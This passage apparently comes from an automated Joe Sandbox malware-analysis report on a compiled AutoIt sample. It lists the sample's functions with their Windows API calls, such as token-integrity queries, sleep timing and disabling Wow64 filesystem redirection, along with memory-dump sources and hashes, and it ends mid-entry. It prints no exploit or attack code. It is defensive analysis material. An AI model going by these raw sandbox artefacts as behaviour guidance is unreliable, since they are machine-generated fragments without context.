              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001D879D
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
              • String ID:
              • API String ID: 842720411-0
              • Opcode ID: de1318c17ede0dd30edc0433a10c50992e75ad58f142a41ee3ab07069ebcee04
              • Instruction ID: ad29f52360dcd3c6199428ead1189a62d5fc6478111377fd16de0493f86941ea
              • Opcode Fuzzy Hash: de1318c17ede0dd30edc0433a10c50992e75ad58f142a41ee3ab07069ebcee04
              • Instruction Fuzzy Hash: 3801FB71641304EFDB204FA6ED8CD6BBBBDEF89755720056AF949C2261DB329D40CA60
              Function 001E54E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
              Download Yara Rule
              APIs
              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 001E5502
              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 001E5510
              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 001E5518
              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 001E5522
              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 001E555E
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: PerformanceQuery$CounterSleep$Frequency
              • String ID:
              • API String ID: 2833360925-0
              • Opcode ID: cf54992139f9f740b92056ebbe4855f985a20d7f9a161acff59678d6e9968011
              • Instruction ID: 8cdbf741d58fdfeccb8c2d1b62798b2b7e5362bb5aa7280c35711f95dcb6b2b4
              • Opcode Fuzzy Hash: cf54992139f9f740b92056ebbe4855f985a20d7f9a161acff59678d6e9968011
              • Instruction Fuzzy Hash: A6013931D00A19DBCF10ABE9E98C5EDBB7ABF09709F410056E805F2541DB30955087A1
              Function 001D7652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
              Download Yara Rule
              APIs
              • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001D758C,80070057,?,?,?,001D799D), ref: 001D766F
              • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001D758C,80070057,?,?), ref: 001D768A
              • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001D758C,80070057,?,?), ref: 001D7698
              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001D758C,80070057,?), ref: 001D76A8
              • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,001D758C,80070057,?,?), ref: 001D76B4
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: From$Prog$FreeStringTasklstrcmpi
              • String ID:
              • API String ID: 3897988419-0
              • Opcode ID: e3a349efb5ef150f85accbf6b5486f9dba19ec9d0a8d0f3bb807014f1da88781
              • Instruction ID: c1474f5218df951d09e4dea7fdf93e10f0a6c27bebd22a81e16162239c0f1fd2
              • Opcode Fuzzy Hash: e3a349efb5ef150f85accbf6b5486f9dba19ec9d0a8d0f3bb807014f1da88781
              • Instruction Fuzzy Hash: F7018472601704BBEB209F58ED48BAA7BADEB44751F14402AFD04D2352F731DD40D7A0
              Function 001D85F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
              Download Yara Rule
              APIs
              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 001D8608
              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 001D8612
              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 001D8621
              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 001D8628
              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 001D863E
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: HeapInformationToken$AllocErrorLastProcess
              • String ID:
              • API String ID: 44706859-0
              • Opcode ID: 4f2ae47f504521b0b4e471b3cf232b982dce6f7878d2f7e4a15df24f66f60b48
              • Instruction ID: cf0e1cc726b82a6ffb83ca38111b88e22e1840690c299a521e5ebf1b94c3e4fa
              • Opcode Fuzzy Hash: 4f2ae47f504521b0b4e471b3cf232b982dce6f7878d2f7e4a15df24f66f60b48
              • Instruction Fuzzy Hash: FCF06231245314AFEB200FA9ED8DE6B3BADEF89764B004426F949C6251CB71DC41DA60
              Function 001D8652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
              Download Yara Rule
              APIs
              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 001D8669
              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 001D8673
              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001D8682
              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 001D8689
              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001D869F
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: HeapInformationToken$AllocErrorLastProcess
              • String ID:
              • API String ID: 44706859-0
              • Opcode ID: 4e967ffc48b91605fce4c1d87fb85eb009dfc4e5011aa6886b270aae02021216
              • Instruction ID: a3012a552ba0d80fcbf714b2e4903a24110e45c517c99cbc0bc9b7b94db1b7da
              • Opcode Fuzzy Hash: 4e967ffc48b91605fce4c1d87fb85eb009dfc4e5011aa6886b270aae02021216
              • Instruction Fuzzy Hash: 20F06D71280314BFEB211FA6EC8CE6B7BADEF89764B10002AF949C7251CB71DD41DA60
              Function 001DC6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
              Download Yara Rule
              APIs
              • GetDlgItem.USER32(?,000003E9), ref: 001DC6BA
              • GetWindowTextW.USER32(00000000,?,00000100), ref: 001DC6D1
              • MessageBeep.USER32(00000000), ref: 001DC6E9
              • KillTimer.USER32(?,0000040A), ref: 001DC705
              • EndDialog.USER32(?,00000001), ref: 001DC71F
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: BeepDialogItemKillMessageTextTimerWindow
              • String ID:
              • API String ID: 3741023627-0
              • Opcode ID: d53234bdaa09ca8ec0f35d9b944310f85ce3f5add25cc52e9aefe287a9b3dfa4
              • Instruction ID: e407ca40bdcec20937af345d01e400cf447274b7e6913b8de3f0365acd9e2e31
              • Opcode Fuzzy Hash: d53234bdaa09ca8ec0f35d9b944310f85ce3f5add25cc52e9aefe287a9b3dfa4
              • Instruction Fuzzy Hash: C8016230540705ABEB755B20ED8EF96B7BCFF00705F040A6AF592A19E1DBE1A954CF80
              Function 001813B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
              Download Yara Rule
              APIs
              • EndPath.GDI32(?), ref: 001813BF
              • StrokeAndFillPath.GDI32(?,?,001BBAD8,00000000,?), ref: 001813DB
              • SelectObject.GDI32(?,00000000), ref: 001813EE
              • DeleteObject.GDI32 ref: 00181401
              • StrokePath.GDI32(?), ref: 0018141C
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Path$ObjectStroke$DeleteFillSelect
              • String ID:
              • API String ID: 2625713937-0
              • Opcode ID: d275d056a4b84e941f0742b1a09dd327dd5d984593dfc1ff2fd36e0344e7762c
              • Instruction ID: ba8663b6fe0192d69a22ed4ad04c66b4b061dac5e0f7ec5d52741408f74271f9
              • Opcode Fuzzy Hash: d275d056a4b84e941f0742b1a09dd327dd5d984593dfc1ff2fd36e0344e7762c
              • Instruction Fuzzy Hash: 33F0EC75044708EBDB666F26FD0C7583FA9A703726F04C224E829458F2C7314A9ADF51
              Function 00192E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 001A0FF6: std::exception::exception.LIBCMT ref: 001A102C
                • Part of subcall function 001A0FF6: __CxxThrowException@8.LIBCMT ref: 001A1041
                • Part of subcall function 00187F41: _memmove.LIBCMT ref: 00187F82
                • Part of subcall function 00187BB1: _memmove.LIBCMT ref: 00187C0B
              • __swprintf.LIBCMT ref: 0019302D
              Strings
              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00192EC6
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
              • API String ID: 1943609520-557222456
              • Opcode ID: a10daa891cd506fd1c32b12193bf4268aacb0ee76497b74fbd9595ddc2f92d33
              • Instruction ID: 386fe89951f37faa2607591b3b411de3f0c4bc5796bdb0327767235515944e35
              • Opcode Fuzzy Hash: a10daa891cd506fd1c32b12193bf4268aacb0ee76497b74fbd9595ddc2f92d33
              • Instruction Fuzzy Hash: 06918935508301AFCB28FF24D895D6EB7A9EFA5740F14491DF4929B2A1DB30EE44CB52
              Function 001DB7B6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
              Download Yara Rule
              APIs
              • OleSetContainedObject.OLE32(?,00000001), ref: 001DB981
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ContainedObject
              • String ID: AutoIt3GUI$Container$%!
              • API String ID: 3565006973-3188250632
              • Opcode ID: 123f2f2b0ba16f804868e46cfb21e0ca94defe206af96cb1212d6c820d8509b8
              • Instruction ID: d8caa19116b18c4d0670834e2585af87876a015f42f5e1e47e877a4f2f5422d8
              • Opcode Fuzzy Hash: 123f2f2b0ba16f804868e46cfb21e0ca94defe206af96cb1212d6c820d8509b8
              • Instruction Fuzzy Hash: 019148B4614201DFDB24DF28C884A6ABBE8FF49710F15856EF94ACB791DB70E840CB50
              Function 001A524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
              Download Yara Rule
              APIs
              • __startOneArgErrorHandling.LIBCMT ref: 001A52DD
                • Part of subcall function 001B0340: __87except.LIBCMT ref: 001B037B
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ErrorHandling__87except__start
              • String ID: pow
              • API String ID: 2905807303-2276729525
              • Opcode ID: 4d0465286e3d2374afe535f0e0f31940b2caaa0b7513d1547fc6ded36ab2a8dd
              • Instruction ID: 8fec0272fcc6da9001987ea6bd3dd8fcea4b782126fc221c335511afdd44c23b
              • Opcode Fuzzy Hash: 4d0465286e3d2374afe535f0e0f31940b2caaa0b7513d1547fc6ded36ab2a8dd
              • Instruction Fuzzy Hash: B4519B25E0CA01C7CB167724DA453FF2BE1BF96350F208D69E085822E9EF748CD49A82
              Function 001A023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID:
              • String ID: #$+
              • API String ID: 0-2552117581
              • Opcode ID: 297612dc6ea885142ec816c684c13b125d1cc0b2a7cce78bda31ff9246f13b6c
              • Instruction ID: 089256a6c67b1f844cc43c6380fd11ab9aff7be84459d119b9c7424a49477fb5
              • Opcode Fuzzy Hash: 297612dc6ea885142ec816c684c13b125d1cc0b2a7cce78bda31ff9246f13b6c
              • Instruction Fuzzy Hash: 47512339504A45DFCF26AFA8C4886FA7BA6FF2A310F144056EC919B3A0D7349D42CB71
              Function 001962F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _memset$_memmove
              • String ID: ERCP
              • API String ID: 2532777613-1384759551
              • Opcode ID: 702e41c197d16216f43cecac59a0dda51ada1e1515eba8a6adfbbf666b08bfe2
              • Instruction ID: 86f87fa8f9fa8f8042bc75a88510787992f4c2360ae42eeeabe96ed122c02aac
              • Opcode Fuzzy Hash: 702e41c197d16216f43cecac59a0dda51ada1e1515eba8a6adfbbf666b08bfe2
              • Instruction Fuzzy Hash: 78519171900709EFDB24CFA5C8857AABBF4FF04714F20856EEA4ACB241E771A694CB50
              Function 00207648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
              Download Yara Rule
              APIs
              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 002076D0
              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 002076E4
              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00207708
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend$Window
              • String ID: SysMonthCal32
              • API String ID: 2326795674-1439706946
              • Opcode ID: 93c48f054b66aa7a8823649f98ad2d7cd98d05229315ce61901d5a9024af78f9
              • Instruction ID: dc2ddeb7ea67aaef2c6745b761185565a9dbbc2f57f9b0dd25d6039d6dae235e
              • Opcode Fuzzy Hash: 93c48f054b66aa7a8823649f98ad2d7cd98d05229315ce61901d5a9024af78f9
              • Instruction Fuzzy Hash: 8021D132510219BBDF21CFA4CC46FEA3B79EF48714F110214FE156B1D1DAB2B8618BA0
              Function 00206F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
              Download Yara Rule
              APIs
              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00206FAA
              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00206FBA
              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00206FDF
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend$MoveWindow
              • String ID: Listbox
              • API String ID: 3315199576-2633736733
              • Opcode ID: 237513b3913b559719637bd38eaea08fd9573222f4e37b408f375fa9d9c78a31
              • Instruction ID: 6c6c09c8a7371b9591e923c56dd159ee1d75f03bfe1957a230abedb1d305e7e8
              • Opcode Fuzzy Hash: 237513b3913b559719637bd38eaea08fd9573222f4e37b408f375fa9d9c78a31
              • Instruction Fuzzy Hash: F621B33262021ABFDF118F54EC8DFAB37AAEF89754F018124F915975D1C6719C618BA0
              Function 0020797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
              Download Yara Rule
              APIs
              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 002079E1
              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 002079F6
              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00207A03
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend
              • String ID: msctls_trackbar32
              • API String ID: 3850602802-1010561917
              • Opcode ID: fb02094d20d500f4b2b98b5e28027573d0c97e658a73ce50a3b0dc701c489996
              • Instruction ID: 684835f8a226d4a925712aa10be9813ebb560730ae69b71f2eeaec5cb59eda76
              • Opcode Fuzzy Hash: fb02094d20d500f4b2b98b5e28027573d0c97e658a73ce50a3b0dc701c489996
              • Instruction Fuzzy Hash: A811E772654309BAEF209F60CC05F9B77ADEF89B64F014519F641A60D1D271A821CB60
              Function 00184C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
              Download Yara Rule
              APIs
              • LoadLibraryA.KERNEL32(kernel32.dll,?,00184C2E), ref: 00184CA3
              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00184CB5
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID: GetNativeSystemInfo$kernel32.dll
              • API String ID: 2574300362-192647395
              • Opcode ID: cdba3c10c1a334b905ed29e00a1905b844b8d87e0e51c2150ddb6bc54ad3e015
              • Instruction ID: 3b1be767838ac20a98751297e18cdcfef138a3bc4a142767ebbf802d9913903e
              • Opcode Fuzzy Hash: cdba3c10c1a334b905ed29e00a1905b844b8d87e0e51c2150ddb6bc54ad3e015
              • Instruction Fuzzy Hash: C5D01230550723CFD770AF31DB18606B6D9AF09755B1188399885D6991DB74D480CF50
              Function 00184D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
              Download Yara Rule
              APIs
              • LoadLibraryA.KERNEL32(kernel32.dll,?,00184D2E,?,00184F4F,?,002462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00184D6F
              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00184D81
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
              • API String ID: 2574300362-3689287502
              • Opcode ID: 151766a21516810cd769b0ed8adb8c4b74f3917c52b1318dcb29b71ef180418d
              • Instruction ID: 754237ed30448e2ae0ccb91d76309b987f5d5ccf27388e35c514900129987267
              • Opcode Fuzzy Hash: 151766a21516810cd769b0ed8adb8c4b74f3917c52b1318dcb29b71ef180418d
              • Instruction Fuzzy Hash: 0ED01270550713CFD7309F71D908616B6D8BF15351B118D39988AD6650DB70D480CF50
              Function 00184D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
              Download Yara Rule
              APIs
              • LoadLibraryA.KERNEL32(kernel32.dll,?,00184CE1,?), ref: 00184DA2
